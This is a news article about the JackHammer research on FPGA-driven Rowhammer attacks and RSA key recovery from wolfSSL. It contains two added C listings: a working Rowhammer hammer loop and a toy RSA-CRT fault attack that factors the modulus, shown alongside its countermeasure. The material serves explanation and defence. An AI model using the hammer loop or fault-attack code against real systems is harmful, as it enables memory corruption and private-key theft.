

FPGA cards can be abused for faster and more reliable Rowhammer attacks



Image: ZDNet, Priyanka from the Noun Project

In a new research paper published on the last day of 2019, a team of American and German academics has shown that field-programmable gate array (FPGA) cards can be abused to launch better and faster Rowhammer attacks.

The new research expands on previous work into an attack vector known as Rowhammer.

A short history of Rowhammer attacks

Rowhammer attacks were first detailed in 2014. The attack exploits a physical weakness in modern DRAM, the chips that make up a computer's memory modules, most commonly known as RAM.

In DRAM, data is stored in tiny capacitive memory cells arranged in a grid of rows and columns. In 2014, academics showed that repeatedly activating one row, by reading from it at high speed, disturbs the charge held in cells of the physically adjacent rows, so that some of their bits change value without ever being written.

By repeating these accesses hundreds of thousands of times between two DRAM refreshes, an operation named "row hammering," they could corrupt data in neighbouring rows, or flip chosen bits to manipulate a victim's data in malicious ways.

After it was disclosed to the public, industry experts deemed the Rowhammer attack only a theoretical threat, but one that had the potential to become a bigger problem later down the line.

Experts believed that while the initial Rowhammer attack looked inefficient at altering or corrupting data, academics would eventually find new ways to launch Rowhammer attacks and improve the damage the attack could cause.

Memory vendors reacted by modifying DRAM designs, for example with targeted row refresh (TRR), while operating system and browser vendors introduced software mitigations to limit the damage a future, more practical Rowhammer attack could cause.

Just as initially predicted, over the past five years academics have greatly expanded on the original Rowhammer attack. They found ways around mitigations, they extended the attack to other computer components and configurations, and they even found a way to use Rowhammer to read data from attacked systems, instead of just altering it. Below is a summary of all the work done with Rowhammer attacks.

New JackHammer attack

The latest addition to this list is a new Rowhammer attack variation called JackHammer, which allows a malicious party to abuse FPGA cards to launch better and faster Rowhammer attacks.

For those unfamiliar with the term, an FPGA is a chip whose logic can be reconfigured by the user after manufacture. In desktops and servers it usually arrives as a PCIe add-in card, or integrated alongside the CPU in the same package, and is programmed with custom circuits that offload specific workloads from the CPU, which is why FPGAs are often referred to as "accelerators."

FPGAs are often used in systems built for very specific tasks, such as cryptocurrency mining, web serving, heavy numerical computation, and so on.

In recent years, FPGAs have made their way into cloud computing environments, where they are now a common offering. Companies like Alibaba Cloud and Amazon Web Services (AWS) offer FPGA-equipped server instances so that customers can optimize performance for specific tasks, and Microsoft is also working on integrating FPGA-based technology inside Azure.

Seeing that FPGA-CPU architectures are becoming more common, a team of researchers from the Worcester Polytechnic Institute in the US, the University of Lübeck in Germany, and Intel looked into how Rowhammer attacks behave on this new cloud setup.

They found that when the hammering is driven from a user-configured FPGA, it causes bit flips more efficiently and faster than when it is driven by malicious code running on the CPU, which is how all previous Rowhammer attacks worked.

This is because the FPGA attaches to the processor's interconnect and issues memory requests itself, without going through the CPU's cache hierarchy, instruction pipeline, or operating system. A CPU-based attacker has to evict each aggressor address from the cache before every access so that the read actually reaches DRAM; the FPGA's requests go to memory directly, so it can hammer rows at a higher and steadier rate.

Twice as fast, four times more bit flips

“In a Rowhammer attack, a significant factor in the speed and efficacy of an attack is the rate at which memory can be repeatedly accessed,” the research team explains.

“On many systems, the CPU is sufficiently fast to cause some bit flips, but the FPGA can repeatedly access its host machine’s memory system substantially faster than the host machine’s CPU can.”
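To make the memory-access-rate argument concrete, here is the canonical CPU-side hammer loop as an added example; it is not code from the paper or from the original article. It reads two aggressor addresses, flushes them from the cache so that every read reaches DRAM, and afterwards counts bit flips in the victim range. The buffer layout and stride in the demo harness are placeholders (an assumption for illustration): a real attack resolves physical addresses and the DRAM address mapping to find addresses in the rows physically adjacent to the victim, and on a machine with working mitigations, or with too few iterations, the function simply reports zero flips.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
#include <emmintrin.h>                 /* _mm_clflush, _mm_mfence */
#define FLUSH(p) _mm_clflush((const void *)(p))
#define FENCE()  _mm_mfence()
#else                                  /* other ISAs: no flush here, loop still runs */
#define FLUSH(p) ((void)(p))
#define FENCE()  __sync_synchronize()
#endif

/* Number of bits in buf that differ from the pattern it was filled with. */
static size_t count_bit_flips(const uint8_t *buf, size_t len, uint8_t pattern)
{
    size_t flips = 0;
    for (size_t i = 0; i < len; i++)
        flips += (size_t)__builtin_popcount((unsigned)(buf[i] ^ pattern));
    return flips;
}

/* CPU-side double-sided hammer loop.  aggr1/aggr2 are addresses in the two DRAM
 * rows on either side of the victim row; each read forces the row to be
 * re-activated, and each flush makes sure the next read goes to DRAM instead
 * of being served from the cache.  Returns the number of flipped bits found in
 * the victim range afterwards. */
static size_t hammer_and_count(uint8_t *aggr1, uint8_t *aggr2,
                               uint8_t *victim, size_t victim_len,
                               uint8_t pattern, uint64_t iterations)
{
    memset(victim, pattern, victim_len);
    FENCE();
    for (uint64_t i = 0; i < iterations; i++) {
        (void)*(volatile uint8_t *)aggr1;   /* ACTIVATE row A */
        (void)*(volatile uint8_t *)aggr2;   /* ACTIVATE row B */
        FLUSH(aggr1);                       /* evict, or the CPU never hits DRAM again */
        FLUSH(aggr2);
        FENCE();                            /* keep the flushes ordered with the reads */
    }
    return count_bit_flips(victim, victim_len, pattern);
}

/* Demo harness with a placeholder layout (assumption): the victim sits in the
 * middle of one buffer and the "aggressors" one stride above and below.  A real
 * attack instead resolves physical addresses (huge pages or /proc/self/pagemap)
 * plus the DRAM address mapping to pick addresses in the rows physically
 * adjacent to the victim row. */
#define DEMO_STRIDE (8u * 1024u)

static size_t demo_hammer(uint64_t iterations)
{
    uint8_t *buf = malloc(3 * DEMO_STRIDE);
    if (!buf) return (size_t)-1;
    memset(buf, 0, 3 * DEMO_STRIDE);
    size_t flips = hammer_and_count(buf, buf + 2 * DEMO_STRIDE,
                                    buf + DEMO_STRIDE, DEMO_STRIDE,
                                    0xFF, iterations);
    free(buf);
    return flips;
}

int main(void)
{
    /* A real attack issues hundreds of thousands of activations inside each
     * ~64 ms DRAM refresh window and retries across many candidate rows. */
    size_t flips = demo_hammer(1000000);
    printf("bit flips observed in victim range: %zu\n", flips);
    return 0;
}
```

The flush in every iteration is the per-access cost the FPGA path described above avoids: its requests go to memory without passing through the CPU's cache, so the same access pattern driven from the FPGA reaches a higher activation rate per refresh window.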

In a proof-of-concept experiment detailed in their paper, the research team launched a classic CPU-based Rowhammer attack and the new FPGA-based JackHammer attack against the WolfCrypt RSA implementation, part of the wolfSSL library, and recovered the RSA private key used to secure SSL connections by using bit flips to corrupt the library's RSA computations.

“Our results indicate that a malicious FPGA can perform twice as fast as a typical Rowhammer attack from the CPU on the same system and causes around four times as many bit flips as the CPU attack,” the research team said.


Image: Weissman et al.

Furthermore, the academic team found that a JackHammer attack is much harder to detect, because the FPGA's direct access to memory leaves no trace on the CPU of the FPGA's memory operations. Since most Rowhammer detection techniques monitor the CPU, for example through its hardware performance counters, this opens a new blind spot in CPU and cloud security.

For their tests, the academics used an Intel Arria 10 GX FPGA; however, this does not mean Arria FPGAs are themselves vulnerable. The FPGA is the attacker's tool, and the DRAM is the target.

By design, FPGAs are meant to “accelerate” systems. The actual problem behind JackHammer is the inherent trust put in user-configurable FPGAs used in cloud environments, and the lack of security controls and protections designed for FPGA-run code.

“From a security perspective, a user-configurable FPGA on a cloud system needs to be treated with at least as much care and caution as a user-controlled CPU thread, as it can exploit many of the same vulnerabilities,” researchers said.

The research team hopes their work will prompt cloud vendors to add appropriate protections against malicious logic running on FPGAs, not just against malicious code running on CPUs.

The research team listed several mitigations that cloud vendors could deploy to secure their platforms against JackHammer. They include hardware-level monitoring of memory traffic, partitioning the CPU cache, pinning cache lines, raising the DRAM refresh rate, and more.

For more details on this new FPGA attack vector, please see the research team’s white paper, titled “JackHammer: Efficient Rowhammer on Heterogeneous FPGA-CPU Platforms.”

wolfSSL 4.3.0, released on December 20, 2019, contains a fix (CVE-2019-19962) for the RSA weakness the JackHammer fault attack exploited. A library-level fix of this kind protects the key material against a corrupted computation; it cannot stop the underlying bit flips, which are a property of the DRAM rather than of the software.
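The page describes a private-key recovery against WolfCrypt RSA and the corresponding library fix without detailing either. As an added example, which is neither wolfSSL's code nor the paper's attack, the classic RSA-CRT fault attack below shows the shape of that problem and the standard library-level countermeasure: a single bit flipped in one half of a CRT signature computation lets anyone holding the public key factor N with one gcd, and verifying the signature before release stops the faulty value from ever leaving the library. The key, the message, and the injected fault are all constructed, and the key is 64 bits so that the example runs without a bignum library; whether wolfSSL's 4.3.0 fix takes exactly this form is not stated on the page.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

typedef unsigned __int128 u128;
typedef __int128 i128;

/* Constructed toy key: two 32-bit primes, so N fits in 64 bits and no bignum
 * library is needed.  Real keys are 2048+ bits; the attack is size-independent. */
#define TOY_P 4294967291ULL   /* 2^32 - 5  */
#define TOY_Q 4294967279ULL   /* 2^32 - 17 */
#define TOY_E 65537ULL

typedef struct { uint64_t n, e, p, q, dp, dq, qinv; } rsa_key;

static uint64_t mulmod(uint64_t a, uint64_t b, uint64_t m)
{
    return (uint64_t)(((u128)a * b) % m);
}

static uint64_t powmod(uint64_t base, uint64_t exp, uint64_t m)
{
    uint64_t r = 1 % m;
    base %= m;
    for (; exp; exp >>= 1) {
        if (exp & 1) r = mulmod(r, base, m);
        base = mulmod(base, base, m);
    }
    return r;
}

static uint64_t gcd64(uint64_t a, uint64_t b)
{
    while (b) { uint64_t t = a % b; a = b; b = t; }
    return a;
}

/* a^-1 mod m by extended Euclid; all values are < 2^64 so i128 never overflows. */
static uint64_t invmod(uint64_t a, uint64_t m)
{
    i128 old_r = a, r = m, old_s = 1, s = 0;
    while (r) {
        i128 q = old_r / r, t;
        t = old_r - q * r; old_r = r; r = t;
        t = old_s - q * s; old_s = s; s = t;
    }
    old_s %= (i128)m;
    if (old_s < 0) old_s += m;
    return (uint64_t)old_s;
}

static rsa_key toy_key(void)
{
    rsa_key k = { .p = TOY_P, .q = TOY_Q, .e = TOY_E };
    k.n = k.p * k.q;
    uint64_t d = invmod(k.e, (k.p - 1) * (k.q - 1));
    k.dp = d % (k.p - 1);          /* CRT exponents */
    k.dq = d % (k.q - 1);
    k.qinv = invmod(k.q, k.p);     /* Garner recombination coefficient */
    return k;
}

/* RSA-CRT signing the way libraries implement it, with no check on the result.
 * fault_bit >= 0 models a Rowhammer bit flip landing in the q-side intermediate
 * (assumption: any corruption confined to one CRT half behaves the same way). */
static uint64_t crt_sign_unchecked(const rsa_key *k, uint64_t m, int fault_bit)
{
    uint64_t sp = powmod(m, k->dp, k->p);
    uint64_t sq = powmod(m, k->dq, k->q);
    if (fault_bit >= 0) sq ^= 1ULL << fault_bit;
    uint64_t h = mulmod(k->qinv, (sp + k->p - sq % k->p) % k->p, k->p);
    return (uint64_t)((sq + (u128)h * k->q) % k->n);   /* s = sq + q*h */
}

/* Bellcore attack: a faulty s' still satisfies s'^e == m (mod p) but not (mod q),
 * so gcd(s'^e - m, N) is p.  Needs only the public key, m, and one bad signature. */
static uint64_t recover_factor(uint64_t n, uint64_t e, uint64_t m, uint64_t faulty_sig)
{
    uint64_t t = powmod(faulty_sig, e, n), mm = m % n;
    uint64_t delta = (t >= mm) ? t - mm : t + (n - mm);   /* (t - m) mod n, no overflow */
    return gcd64(delta, n);
}

/* The countermeasure: verify the signature with the public key before it leaves
 * the library, and refuse to output it if a corrupted computation produced it. */
static bool crt_sign_checked(const rsa_key *k, uint64_t m, int fault_bit, uint64_t *sig)
{
    uint64_t s = crt_sign_unchecked(k, m, fault_bit);
    if (powmod(s, k->e, k->n) != m % k->n) { *sig = 0; return false; }
    *sig = s;
    return true;
}

int main(void)
{
    rsa_key k = toy_key();
    uint64_t m = 0x1234567890abcdefULL % k.n;       /* constructed message hash */
    uint64_t bad = crt_sign_unchecked(&k, m, 7);     /* one flipped bit in sq */
    printf("p recovered from faulty signature: %llu (p = %llu)\n",
           (unsigned long long)recover_factor(k.n, k.e, m, bad),
           (unsigned long long)TOY_P);
    uint64_t s;
    printf("checked signer released the faulty signature: %s\n",
           crt_sign_checked(&k, m, 7, &s) ? "yes" : "no");
    return 0;
}
```

The check costs one public-key exponentiation per signature, which is why it is the usual library-level answer to fault attacks on RSA-CRT. It is also why such a fix is only partial in the JackHammer setting: it stops the key from leaking through a faulty signature, but flips landing in other data, or in code, are untouched, which is the case the platform-level mitigations listed above are meant to cover.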
